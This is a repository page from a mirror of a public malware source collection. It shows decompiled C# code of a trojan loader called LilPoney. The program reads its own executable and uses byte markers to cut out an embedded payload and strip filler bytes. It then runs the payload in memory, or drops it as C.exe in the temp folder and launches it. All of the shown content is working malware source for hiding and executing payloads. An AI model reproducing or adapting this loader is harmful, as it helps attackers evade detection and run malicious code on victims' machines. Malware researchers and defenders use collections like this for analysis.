ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-20 00:58:52 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/I/Trojan.Win32.Inject.aagsb-7963deb448437c7505789ca0bcb4b13edfc5b040b6004eeb17e9d495e54067ff/Program.cs

127 lines
3.6 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: LilPoney.Program
// Assembly: LilPoney, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1C63AA57-9559-4CD2-A85A-70799118F319
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Inject.aagsb-7963deb448437c7505789ca0bcb4b13edfc5b040b6004eeb17e9d495e54067ff.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
namespace LilPoney
{
internal class Program
{
private static byte[] CRYPT_KEY = new byte[8]
{
(byte) 5,
(byte) 6,
(byte) 21,
(byte) 22,
(byte) 64,
(byte) 69,
(byte) 133,
(byte) 101
};
private static byte[] SPLIT_KEY = new byte[8]
{
(byte) 5,
(byte) 69,
(byte) 135,
(byte) 24,
(byte) 38,
(byte) 20,
(byte) 8,
(byte) 119
};
private static void Main(string[] args)
{
byte[] numArray = new byte[0];
StreamReader streamReader = new StreamReader(Process.GetCurrentProcess().MainModule.FileName);
byte[] bytesWithoutCrypt = Program.getAllBytesWithoutCrypt(Program.getAllBytesWithoutStub(new BinaryReader(streamReader.BaseStream).ReadBytes(Convert.ToInt32(streamReader.BaseStream.Length))));
if (Program.onRunExeByteArray(bytesWithoutCrypt))
return;
StreamWriter streamWriter = new StreamWriter(Path.GetTempPath() + "C.exe");
foreach (byte num in bytesWithoutCrypt)
streamWriter.BaseStream.WriteByte(num);
streamWriter.Close();
Process.Start(Path.GetTempPath() + "C.exe");
}
private static byte[] getAllBytesWithoutStub(byte[] allBytes)
{
List<byte> byteList = new List<byte>();
int num = 0;
bool flag = false;
for (int index1 = 0; index1 < allBytes.Length; ++index1)
{
if ((int) allBytes[index1] == (int) Program.SPLIT_KEY[0] && num < 2)
{
for (int index2 = 0; index2 < Program.SPLIT_KEY.Length && (int) allBytes[index1 + index2] == (int) Program.SPLIT_KEY[index2]; ++index2)
{
if (index2 == Program.SPLIT_KEY.Length - 1)
{
++num;
index1 += index2;
}
}
}
if (num == 2)
{
if (!flag)
flag = true;
else
byteList.Add(allBytes[index1]);
}
}
return byteList.ToArray();
}
private static byte[] getAllBytesWithoutCrypt(byte[] allBytes)
{
List<byte> byteList = new List<byte>();
bool flag = false;
for (int index1 = 0; index1 < allBytes.Length; ++index1)
{
if ((int) allBytes[index1] == (int) Program.CRYPT_KEY[0])
{
for (int index2 = 0; index2 < Program.CRYPT_KEY.Length && (int) allBytes[index1 + index2] == (int) Program.CRYPT_KEY[index2]; ++index2)
{
if (index2 == Program.CRYPT_KEY.Length - 1)
{
flag = true;
index1 += index2;
}
}
}
if (!flag)
byteList.Add(allBytes[index1]);
flag = false;
}
return byteList.ToArray();
}
private static bool onRunExeByteArray(byte[] allBytes)
{
try
{
Assembly assembly = Assembly.Load(allBytes);
MethodInfo entryPoint = assembly.EntryPoint;
if ((object) entryPoint != null)
{
object instance = assembly.CreateInstance(entryPoint.Name);
entryPoint.Invoke(instance, (object[]) null);
}
}
catch (Exception ex)
{
return false;
}
return true;
}
}
}
Reference in New Issue Copy Permalink